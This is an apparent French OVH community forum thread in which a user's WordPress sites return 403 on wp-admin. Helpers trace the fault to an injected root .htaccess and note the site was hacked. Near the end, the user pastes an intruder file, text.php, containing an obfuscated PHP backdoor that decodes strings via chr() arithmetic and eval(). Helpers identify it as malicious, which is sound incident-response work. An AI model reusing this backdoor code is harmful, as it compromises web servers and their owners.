WP-admin: 403 Forbidden
BMPCreated with Sketch.BMPZIPCreated with Sketch.ZIPXLSCreated with Sketch.XLSTXTCreated with Sketch.TXTPPTCreated with Sketch.PPTPNGCreated with Sketch.PNGPDFCreated with Sketch.PDFJPGCreated with Sketch.JPGGIFCreated with Sketch.GIFDOCCreated with Sketch.DOC Error Created with Sketch.
Question

WP-admin: 403 Forbidden

by
Chen-Nie_SiniY
Created on 2024-02-03 15:30:02 (edited on 2024-09-04 11:10:38) in Hébergements Web

Bonjour,

Subitement tous les sites sur mon hébergement Performance 1 sur le cluster031 ne sont plus gérables.
ai-hao.be
as-shinto.be
site vierge test 01.sn

Les sites fonctionnent de manière bancale et sont partiellement accessibles: via wp-admin= 403 Forbidden
Je n'ai aucune trace de piratage
J'ai tout même tout nettoyé pour remettre les backups initiaux (01/01/2023) tout comme les deux bases de données mais le problème reste identique.

J'ai testé l'installation d'un nouveau domaine que j'ai rajouté sur cet hébergement qui dispose encore suffisamment d'espace.
J'installe WP via le one click solution avec la version que propose OVH, le module ainsi que la nouvelle base de données se crée sans souci mais impossible de modifier quoi que ce soit dans WP et encore moins y faire un update automatique. Tout le module est donc encore vierge et les soucis apparaissent de suite.
Fichier .htaccess est inchangé

# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.

RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

Sur les deux sites existants:

# BEGIN WordPress
# De richtlijnen (regels) tussen "BEGIN WordPress" en "END WordPress" worden
# dynamisch gegenereerd en zouden alleen aangepast mogen worden via WordPress filters.
# Alle wijzigingen aan de richtlijnen tussen deze markeringen worden overschreven.

RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteRule . /index.php [L]

# END WordPress

voici le .htaccess de la racine

Order allow,deny
Deny from all

Order allow,deny
Allow from all

RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteRule . index.php [L]

Qui a des indices pour me mettre sur la bonne voie,

merci d'avance.

12 Replies ( Latest reply on 2024-02-14 15:06:27 by
^FabL
)

update: je viens d'installer Opera afin d'avoir un browser clean, les tests donnent les même résultats.
J'ai désactivé le CDN sur tous les domaines

J'installe WP via le one click solution avec la version que propose OVH,

Très mauvaise idée.

Installer un autre site en suivant mes guides :

--> **https://www.wordetweb.com/word-et-web/WORDPRESS-ajouter-deuxieme-domaine-2eme-installation-de-Wordpress-FR.htm Une 2ème installation de site sur un même hébergement**

Et aussi :

Encore des installations de me**e en un clic.

Pour régler facilement votre problème, vous allez pouvoir désinstaller ce module **en un clic** et **installer WordPress manuellement et proprement**.

_Il faut absolument éviter les Solutions en "Un clic" de OVH qui souvent sont anciennes et source de problèmes._
_Privilégier les installations manuelles._

Si vous n'avez pas encore trop travaillé sur votre site, il faudrait supprimer cette "Installation en 1 clic".
**Et installer WordPress manuellement.**

Si le fichier **/www/wp-config.php** existe, les informations d'accès à la base de données pour WordPress se trouvent dans ce fichier :

> // ** reglages MySQL ** //ftp-
> define('DB_NAME', 'xxx'); // Le nom de la base de donnees
> define('DB_USER', 'xxx'); // Votre identifiant MySQL
> define('DB_PASSWORD', 'xxx'); // ...et votre mot de passe
> define('DB_HOST', 'xxx'); // Adresse du serveur de type xxx.mysql.db

Si le fichier **/www/wp-config.php** n'existe pas ou plus, suivre la procédure
**J - WordPress - Création de la Base de Données** décrite dans mon guide.

Pour supprimer cette installation en un clic :
* Par FTP FileZilla vider tout le contenu de www, **mais garder www**
* Via phpmyadmin, supprimer toutes les tables, **mais garder la base**

**Manager OVH > Web Cloud > Hébergement > TonDomaine > Bases de données** :
- En cliquant sur "..." aller "Accéder à PhpMyAdmin"
- et Supprimer toutes les tables, **pas la base.**

_**Puis installer manuellement votre site en suivant mon guide.**_

**__________________________________________________________________________________**

Voici un petit guide que j'ai écrit et qui pourrait vous apporter des éclaircissements pour **une Installation complète et propre de votre Site**.

**************************************************************************************************
* **Guide - Comprendre la Relation Domaine > Zone DNS > Hébergement > Dossier du site** *
**************************************************************************************************

Voir --> **https://wordetweb.com/word-et-web/WORDPRESS-guide-installation-de-WordPress-premier-domaine-chez-OVH-FR.htm CMS - WordPress - Guide Installation chez OVH**
Contrôler votre situation en suivant **attentivement** les paragraphes : **A** à **J**

_N'hésitez pas à me faire un retour : positif ou négatif._
_C'est comme cela que je peaufine mon Guide._

_Si ce guide vous a bien aidé, n'hésitez pas à cliquer sur le bouton « j'aime »_

Order allow,deny
Deny from all

Order allow,deny
Allow from all

Je pense que vous avez été piraté.

Ces 4 lignes n'ont rien à faire là.
Vous aviez installé un Wordpress en néerlandais au Sénégal ?

Alle wijzigingen aan de richtlijnen tussen deze markeringen worden overschreven.

site vierge test 01.sn

merci à vous pour les précieuses infos que je m'empresse à appliquer.
Donc exit le One Click, je vire tout et refait un test à partir de ton tuto.

Je vais d'abord passer par la case cuisine car mon épouse va rentrer du boulot.

Je posterai les résultats après :)

> Fritz2cat
Son site a été victime d'attaques, en principe il ne devrait plus y avoir de trace car on avait remis tout les fichiers et base de données du backup initial que j'avais fait dès qu'il avait terminé son site.

Je pensais qu'Ovh avait instauré de nouvelles sécurités même si j'ai du mal à décrypter le tout :D

Quelles infos minimales doivent se trouver dans un .htaccess?
Je vais le nettoyer car il est possible que le fichier dans la racine bloque le tout

Merci!

Je pensais qu'Ovh avait instauré de nouvelles sécurités

OVH ne peut garantir la sécurité qu'entre les clients. Si un client est infecté, tous les sites qui se trouvent dans cet hébergement sont potentiellement infectés. Mais l'hébergement du voisin (autre client / autre hébergement) ne peut pas être touché.

Quelles infos minimales doivent se trouver dans un .htaccess?

Rien. Enlever le fichier.

Pour Wordpress, ce fichier a de l'importance pour gérer les permaliens. L'enlever casse en général les permaliens.

Super Fritz2cat!

Je remercie les deux héros qui m'ont assisté, c'est bien le .htaccess qui me semblait bon qui est la cause de tous nos soucis.
C'est donc le fichier .htaccess qui se trouve dans la racine où se trouvent .ovhconfig
.bash_logout
.bash_profile
.bashrc
text.php

vu l'emplacement j'hésitais à y toucher

Merci de tout coeur les gars pour cette précieuse aide! On galère depuis une semaine, remis certainement une dizaine de fois le tout :D :D :D

😽 kudos

text.php

C'est à vous, ce fichier là ?

non, je ne sais pas si c'est bien legit ...

voici son contenu incompréhensible pour moi :D

$co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$na = chr(59+39).chr(99-3+1).chr(66-33+82).chr(27+40+34).chr(26+28).chr(17+35).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$ro = chr(4+97+16).chr(53+36+25).chr(76+13+19).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$AmInE = "ZX\132hbCU\x79OCU\x79\116\x79U\x7a\122\x69U\x79\116\x6dd0\112\124\116C\112\124I3\114\x6dd6dW5jb21\x77c\x6d\126\x7ac\x79U\x79OGd6aW5\x6dbG\1060\132SU\x79OG\112hc2U2\116\1069\x6b\132W\116v\132GUlMjh\x7ad\110\112\x79\132XYlMj\x67lMj\122\102bWl\x75\132U\122\x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ\x67\x3d\x3d";
$AmineDns = "wrJVUBg/2sGlzrAVmnmE6G0sSBaU7SRzGV21vgovJIU33Z28Wyd8XPget/dP03b7AbfhcqSQrTbFbj5/9fUO8ZBTkOfNWJDpRpNT9a0SW8iUr2Gsb3iq1UlmduFKHblGuIdpGpEmfcu3tWTdigSYk4NI4y7I1C19M4k78lvcWrvEL+eXPhvqnugcpyJhwBEi15KTUpoz0RIDZdAILyJ8bSsV+bV2Js5xALanh4TMMW7ytjJSeDXQBWy9nteXjv7nlyWdTeWrlSna6YvVPwpj2gdKK34qnjcOmO3ugYx02A8vuyI+IMdMXmlxZyOgaWWIJDbFMZnrZtKOm2z7gYNmOnF1MMdJOkFMITAmocGQbw0PBKvZxCnGmKgHASBxJZedlwkkMl3bSzpwukRsn/2ZnZ2Zvg6KT07/V04EaoGJ65oXJs0SoNtaI5z0RpouIVo4CCUTBvQF8DBUCr22QVFn45/nBAWA";/*2e3300cd40ea092e5eeb579abe01e85a*/
eval($co($ro($na($AmInE))));
exit;
?>

voici son contenu incompréhensible pour moi :D

technique de pirate pour rendre illisible du code malveillant.
Cherchez tous les fichiers php qui ne proviennent pas de votre installation Wordpress.
Si on y trouve "eval(" c'est très suspect.

La date et l'heure de création de ce fichier intrus est un possible indicateur.

Mon conseil c'est de restaurer votre site depuis un backup qui date d'avant votre infection.
Et si vous n'avez pas de backup il faudrait reconstruire à partir de zéro.

en effet, c'était la méthode que j'avais utilisée pour la première infection, là il y avait une masse de fichiers php très louches qui ont été très simples à virer mais au final, on a préféré remettre une version clean que j'avais déjà préparée en vue d'un tel scénario.
Cette fois-ci je n'avais pas détecté le fichier .htaccess dans la racine de l'hébergement avec ces quelques lignes supplémentaires, qui à mes yeux me semblaient pleine de bon sens. Malheureusment ça a bloqué tout l'hébergement...
Les backups sont et resteront un aspect primordial si on veut éviter de gros soucis.

Et mettre à jour ses connaissances :D :D :D

je n'avais pas détecté le fichier .htaccess dans la racine de l'hébergement

... ce qui prouve qu'une infection déborde du site infecté et peut contaminer tous les sites qui seraient également mis dans cet hébergement.

Bonjour,

et aussi ce qui prouve que suite à la précédente restauration, le problème la faille qui a servi d'intrusion n'a pas été corrigé vu que quelqu'un (peut être le même ?) est revenu pirater le site, ce qui va recommencer si le problème n'est pas corrigé.

Cordialement, janus57

Bonjour @Chen-Nie_SiniY,

Si un des différents retours répond à votre demande, je vous invite à marquer ce dernier comme solution.

Dans le cas contraire, n’hésitez pas à ajouter des informations afin qu’une nouvelle réponse vous soit apportée par la communauté.

^FabL